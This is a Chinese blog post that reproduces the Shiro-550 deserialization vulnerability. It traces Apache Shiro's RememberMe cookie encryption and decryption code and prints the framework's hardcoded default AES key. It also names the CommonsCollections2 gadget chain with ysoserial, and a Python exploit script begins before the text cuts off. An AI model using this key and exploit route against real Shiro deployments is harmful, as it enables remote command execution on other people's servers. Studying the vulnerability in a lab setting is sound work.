

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Glacier">
  <meta name="keywords" content="">
  
    <meta name="description" content="Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。  影响版本 Shiro &amp;lt">
<meta property="og:type" content="article">
<meta property="og:title" content="Shiro-550反序列化漏洞复现">
<meta property="og:url" content="https://glacierrrr.online/2023/01/04/Shiro-550%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="Glacier&#39;s Blog">
<meta property="og:description" content="Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。  影响版本 Shiro &amp;lt">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/HgeLRnpxDYit7hs.png">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/oBtaZEwTKyOVIec.png">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/CuxULEhsrSj5wIa.png">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/ANtBJlzRTguFnOp.png">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/DgABhVidkIZUe8p.png">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/yzoGSnuJLr2EWXc.png">
<meta property="og:image" content="https://s2.loli.net/2023/01/04/EsX8jOvBxM3Qgad.png">
<meta property="article:published_time" content="2023-01-04T08:49:24.000Z">
<meta property="article:modified_time" content="2023-01-04T11:47:25.124Z">
<meta property="article:author" content="Glacier">
<meta property="article:tag" content="框架漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://s2.loli.net/2023/01/04/HgeLRnpxDYit7hs.png">
  
  
  
  <title>Shiro-550反序列化漏洞复现 - Glacier&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"glacierrrr.online","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Shiro-550反序列化漏洞复现"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-01-04 16:49" pubdate>
          2023年1月4日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          78 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Shiro-550反序列化漏洞复现</h1>
            
            
              <div class="markdown-body">
                
                <p>Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。<br>Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。</p>
<blockquote>
<p>影响版本 Shiro &lt;= 1.2.4</p>
</blockquote>
<a id="more"></a>
<p>当后端接收到来自未经身份验证的用户的请求时，处理Cookie的流程是</p>
<ol>
<li>检索cookie中RememberMe的值</li>
<li>Base64解码</li>
<li>使用AES解密</li>
<li>反序列化</li>
</ol>
<h1 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h1><ul>
<li>shiro: <a target="_blank" rel="noopener" href="https://github.com/apache/shiro/tree/shiro-root-1.2.4">shiro-root-1.2.4</a></li>
<li>server: <a target="_blank" rel="noopener" href="https://tomcat.apache.org/download-80.cgi">tomcat 8.5.75</a></li>
</ul>
<p>或者使用<a target="_blank" rel="noopener" href="https://vulhub.org/">vulhub</a>来更方便的搭建整个靶场环境<br>首先我们先来分析下shiro的源码<br>先down下来，在IJ里面打开，然后静静地等它下载</p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>首先，我们先明确流程与对线，主要是研究在RememberMe之后的登录过程</p>
<h2 id="加密"><a href="#加密" class="headerlink" title="加密"></a>加密</h2><p>在打开RememberMe之后，其下一步就是加密，那我们先找到RememberMe这个地方</p>
<blockquote>
<p>core/src/main/java/org.apache.shiro/mgt/AbstractRememberMeManager<br>然后找到判断RememberMe和登录认证的函数</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title">onSuccessfulLogin</span><span class="hljs-params">(Subject subject, AuthenticationToken token, AuthenticationInfo info)</span> </span>&#123;<br>    <span class="hljs-comment">//always clear any previous identity:</span><br>    forgetIdentity(subject);<br><br>    <span class="hljs-comment">//now save the new identity:</span><br>    <span class="hljs-keyword">if</span> (isRememberMe(token)) &#123;<br>        rememberIdentity(subject, token, info);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-keyword">if</span> (log.isDebugEnabled()) &#123;<br>            log.debug(<span class="hljs-string">&quot;AuthenticationToken did not indicate RememberMe is requested.  &quot;</span> +<br>                    <span class="hljs-string">&quot;RememberMe functionality will not be executed for corresponding account.&quot;</span>);<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>我们来分析跟进一下<br>首先是在<code>onSuccessfulLogin</code>函数中<code>forgetIdentity(subject);</code>，清除了认证信息，然后通过<code>isRememberMe</code><br>先来跟进该函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">boolean</span> <span class="hljs-title">isRememberMe</span><span class="hljs-params">(AuthenticationToken token)</span> </span>&#123;<br>    <span class="hljs-keyword">return</span> token != <span class="hljs-keyword">null</span> &amp;&amp; (token insta    nceof RememberMeAuthenticationToken) &amp;&amp;<br>            ((RememberMeAuthenticationToken) token).isRememberMe();<br>&#125;<br></code></pre></td></tr></table></figure>
<p>就是个通过RememberMe来判断是否有认证信息的函数，没什么东西，那回来往下看<br>接着就是这个东西，我们继续跟进<code>rememberIdentity(subject, token, info);</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title">rememberIdentity</span><span class="hljs-params">(Subject subject, AuthenticationToken token, AuthenticationInfo authcInfo)</span> </span>&#123;<br>        PrincipalCollection principals = getIdentityToRemember(subject, authcInfo);<br>        rememberIdentity(subject, principals);<br>    &#125;<br></code></pre></td></tr></table></figure>
<p>首先调用了<code>getIdentityToRemember</code>函数，用来判断是获取用户身份<br>接着跟进<code>rememberIdentity</code>函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title">rememberIdentity</span><span class="hljs-params">(Subject subject, PrincipalCollection accountPrincipals)</span> </span>&#123;<br>    <span class="hljs-keyword">byte</span>[] bytes = convertPrincipalsToBytes(accountPrincipals);<br>    rememberSerializedIdentity(subject, bytes);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>看函数名<code>convertPrincipalsToBytes</code>应该是把<code>accountPrincipals</code>转换为了Byte类型，也可以跟进看看</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">byte</span>[] convertPrincipalsToBytes(PrincipalCollection principals) &#123;<br>    <span class="hljs-keyword">byte</span>[] bytes = serialize(principals);<br>    <span class="hljs-keyword">if</span> (getCipherService() != <span class="hljs-keyword">null</span>) &#123;<br>        bytes = encrypt(bytes);<br>    &#125;<br>    <span class="hljs-keyword">return</span> bytes;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>在这里居然藏了一个序列化，还有加密，我们跟进这个加密看看</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">byte</span>[] encrypt(<span class="hljs-keyword">byte</span>[] serialized) &#123;<br>    <span class="hljs-keyword">byte</span>[] value = serialized;<br>    CipherService cipherService = getCipherService();<br>    <span class="hljs-keyword">if</span> (cipherService != <span class="hljs-keyword">null</span>) &#123;<br>        ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());<br>        value = byteSource.getBytes();<br>    &#125;<br>    <span class="hljs-keyword">return</span> value;<br>&#125;<br></code></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2023/01/04/HgeLRnpxDYit7hs.png" srcset="/img/loading.gif" lazyload><br>在debug中可以看到，这里是用到了CBC模式，对序列化后的用户root进行的AES加密，通过<code>getEncryptionCipherKey</code>来获取密钥信息，继续跟进这个函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">byte</span>[] getEncryptionCipherKey() &#123;<br>    <span class="hljs-keyword">return</span> encryptionCipherKey;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>可以看到，这里是返回的固定常量<br><code>private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode(&quot;kPH+bIxk5D2deZiIxcaaaA==&quot;);</code><br><img src="https://s2.loli.net/2023/01/04/oBtaZEwTKyOVIec.png" srcset="/img/loading.gif" lazyload><br>也可以很明显的看到，改密钥也是唯一使用的常量密钥</p>
<p>清楚这一点之后我们再回到<code>rememberIdentity</code>函数中的<code>rememberSerializedIdentity</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">void</span> <span class="hljs-title">rememberSerializedIdentity</span><span class="hljs-params">(Subject subject, <span class="hljs-keyword">byte</span>[] serialized)</span> </span>&#123;<br><br>        <span class="hljs-keyword">if</span> (!WebUtils.isHttp(subject)) &#123;<br>            <span class="hljs-keyword">if</span> (log.isDebugEnabled()) &#123;<br>                String msg = <span class="hljs-string">&quot;Subject argument is not an HTTP-aware instance.  This is required to obtain a servlet &quot;</span> +<br>                        <span class="hljs-string">&quot;request and response in order to set the rememberMe cookie. Returning immediately and &quot;</span> +<br>                        <span class="hljs-string">&quot;ignoring rememberMe operation.&quot;</span>;<br>                log.debug(msg);<br>            &#125;<br>            <span class="hljs-keyword">return</span>;<br>        &#125;<br><br><br>        HttpServletRequest request = WebUtils.getHttpRequest(subject);<br>        HttpServletResponse response = WebUtils.getHttpResponse(subject);<br><br>        <span class="hljs-comment">//base 64 encode it and store as a cookie:</span><br>        String base64 = Base64.encodeToString(serialized);<br><br>        Cookie template = getCookie(); <span class="hljs-comment">//the class attribute is really a template for the outgoing cookies</span><br>        Cookie cookie = <span class="hljs-keyword">new</span> SimpleCookie(template);<br>        cookie.setValue(base64);<br>        cookie.saveTo(request, response);<br>    &#125;<br></code></pre></td></tr></table></figure>
<p>这里的主要过程就是个base64编码，然后放到cookie里面</p>
<p>这里整个存入的流程就就结束了，还是十分好理解且逻辑清晰的</p>
<blockquote>
<p>序列化—&gt;AES加密—&gt;base64编码—&gt;设置到cookie中的rememberme字段</p>
</blockquote>
<h2 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h2><p>解密过程的分析，我们首先找到收到认证时的地方</p>
<blockquote>
<p>core/src/main/java/org.apache.shiro/mgt/DefaultSecurityManager</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">protected</span> PrincipalCollection <span class="hljs-title">getRememberedIdentity</span><span class="hljs-params">(SubjectContext subjectContext)</span> </span>&#123;<br>        RememberMeManager rmm = getRememberMeManager();<br>        <span class="hljs-keyword">if</span> (rmm != <span class="hljs-keyword">null</span>) &#123;<br>            <span class="hljs-keyword">try</span> &#123;<br>                <span class="hljs-keyword">return</span> rmm.getRememberedPrincipals(subjectContext);<br>            &#125; <span class="hljs-keyword">catch</span> (Exception e) &#123;<br>                <span class="hljs-keyword">if</span> (log.isWarnEnabled()) &#123;<br>                    String msg = <span class="hljs-string">&quot;Delegate RememberMeManager instance of type [&quot;</span> + rmm.getClass().getName() +<br>                            <span class="hljs-string">&quot;] threw an exception during getRememberedPrincipals().&quot;</span>;<br>                    log.warn(msg, e);<br>                &#125;<br>            &#125;<br>        &#125;<br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">null</span>;<br>    &#125;<br></code></pre></td></tr></table></figure>
<p>接着我们还是来逐步分析，最开始是<code>getRememberMeManager</code>函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> RememberMeManager <span class="hljs-title">getRememberMeManager</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-keyword">return</span> rememberMeManager;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>简单的获取用户信息<br>接着就是<code>getRememberedPrincipals</code>函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> PrincipalCollection <span class="hljs-title">getRememberedPrincipals</span><span class="hljs-params">(SubjectContext subjectContext)</span> </span>&#123;<br>    PrincipalCollection principals = <span class="hljs-keyword">null</span>;<br>    <span class="hljs-keyword">try</span> &#123;<br>        <span class="hljs-keyword">byte</span>[] bytes = getRememberedSerializedIdentity(subjectContext);<br>        <span class="hljs-comment">//SHIRO-138 - only call convertBytesToPrincipals if bytes exist:</span><br>        <span class="hljs-keyword">if</span> (bytes != <span class="hljs-keyword">null</span> &amp;&amp; bytes.length &gt; <span class="hljs-number">0</span>) &#123;<br>            principals = convertBytesToPrincipals(bytes, subjectContext);<br>        &#125;<br>    &#125; <span class="hljs-keyword">catch</span> (RuntimeException re) &#123;<br>        principals = onRememberedPrincipalFailure(re, subjectContext);<br>    &#125;<br><br>    <span class="hljs-keyword">return</span> principals;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>这里调用的函数有点多，我们一个一个来看,首先是<code>getRememberedSerializedIdentity</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> <span class="hljs-keyword">byte</span>[] getRememberedSerializedIdentity(SubjectContext subjectContext) &#123;<br><br>        <span class="hljs-keyword">if</span> (!WebUtils.isHttp(subjectContext)) &#123;<br>            <span class="hljs-keyword">if</span> (log.isDebugEnabled()) &#123;<br>                String msg = <span class="hljs-string">&quot;SubjectContext argument is not an HTTP-aware instance.  This is required to obtain a &quot;</span> +<br>                        <span class="hljs-string">&quot;servlet request and response in order to retrieve the rememberMe cookie. Returning &quot;</span> +<br>                        <span class="hljs-string">&quot;immediately and ignoring rememberMe operation.&quot;</span>;<br>                log.debug(msg);<br>            &#125;<br>            <span class="hljs-keyword">return</span> <span class="hljs-keyword">null</span>;<br>        &#125;<br><br>        WebSubjectContext wsc = (WebSubjectContext) subjectContext;<br>        <span class="hljs-keyword">if</span> (isIdentityRemoved(wsc)) &#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-keyword">null</span>;<br>        &#125;<br><br>        HttpServletRequest request = WebUtils.getHttpRequest(wsc);<br>        HttpServletResponse response = WebUtils.getHttpResponse(wsc);<br><br>        String base64 = getCookie().readValue(request, response);<br>        <span class="hljs-comment">// Browsers do not always remove cookies immediately (SHIRO-183)</span><br>        <span class="hljs-comment">// ignore cookies that are scheduled for removal</span><br>        <span class="hljs-keyword">if</span> (Cookie.DELETED_COOKIE_VALUE.equals(base64)) <span class="hljs-keyword">return</span> <span class="hljs-keyword">null</span>;<br><br>        <span class="hljs-keyword">if</span> (base64 != <span class="hljs-keyword">null</span>) &#123;<br>            base64 = ensurePadding(base64);<br>            <span class="hljs-keyword">if</span> (log.isTraceEnabled()) &#123;<br>                log.trace(<span class="hljs-string">&quot;Acquired Base64 encoded identity [&quot;</span> + base64 + <span class="hljs-string">&quot;]&quot;</span>);<br>            &#125;<br>            <span class="hljs-keyword">byte</span>[] decoded = Base64.decode(base64);<br>            <span class="hljs-keyword">if</span> (log.isTraceEnabled()) &#123;<br>                log.trace(<span class="hljs-string">&quot;Base64 decoded byte array length: &quot;</span> + (decoded != <span class="hljs-keyword">null</span> ? decoded.length : <span class="hljs-number">0</span>) + <span class="hljs-string">&quot; bytes.&quot;</span>);<br>            &#125;<br>            <span class="hljs-keyword">return</span> decoded;<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-comment">//no cookie set - new site visitor?</span><br>            <span class="hljs-keyword">return</span> <span class="hljs-keyword">null</span>;<br>        &#125;<br>    &#125;<br></code></pre></td></tr></table></figure>
<p>首先是<code>getCookie().readValue</code>读取cookie，再通过<code>ensurePadding</code>函数进行base64的解码<br>然后进到<code>convertBytesToPrincipals</code>函数，继续跟进</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">protected</span> PrincipalCollection <span class="hljs-title">convertBytesToPrincipals</span><span class="hljs-params">(<span class="hljs-keyword">byte</span>[] bytes, SubjectContext subjectContext)</span> </span>&#123;<br>    <span class="hljs-keyword">if</span> (getCipherService() != <span class="hljs-keyword">null</span>) &#123;<br>        bytes = decrypt(bytes);<br>    &#125;<br>    <span class="hljs-keyword">return</span> deserialize(bytes);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>实现了一个解密，然后反序列化，而这个decrypt肯定与前面的加密对称，为CBC模式的AES<br>那整个的读取流程也结束了</p>
<blockquote>
<p>读取cookie中的rememberMe—&gt;base64解码—&gt;AES解密—&gt;反序列化</p>
</blockquote>
<h1 id="POC-EXP"><a href="#POC-EXP" class="headerlink" title="POC EXP"></a>POC EXP</h1><p>根据apache的版本</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>org.apache.commons<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>commons-collections4<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>4.0<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>所以EXP可以直接使用CommonsCollections2的链子，利用ysoserial生成</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> uuid<br><span class="hljs-keyword">import</span> subprocess<br><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">encode_rememberme</span>(<span 